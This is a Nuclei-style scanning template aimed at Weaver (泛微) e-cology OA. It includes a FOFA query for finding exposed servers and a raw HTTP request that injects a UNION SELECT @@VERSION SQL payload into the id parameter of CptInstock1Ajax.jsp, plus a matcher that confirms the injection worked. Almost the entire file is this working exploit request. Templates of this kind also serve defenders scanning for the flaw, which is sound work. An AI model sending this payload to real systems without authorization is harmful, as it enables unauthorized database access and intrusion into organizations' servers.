id: FW-E-Cology-CptInstock1Ajax-SQL

info:
  name: 泛微e-cology-SQL-CptInstock1Ajax
  author: final
  severity: high
  metadata: 
    fofa-query: app="泛微-OA（e-cology）"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1 HTTP/1.1
        Host:{{Hostname}}
        User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
        Accept:*/*
        Connection: Keep-Alive

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"SQL","Enterprise Edition")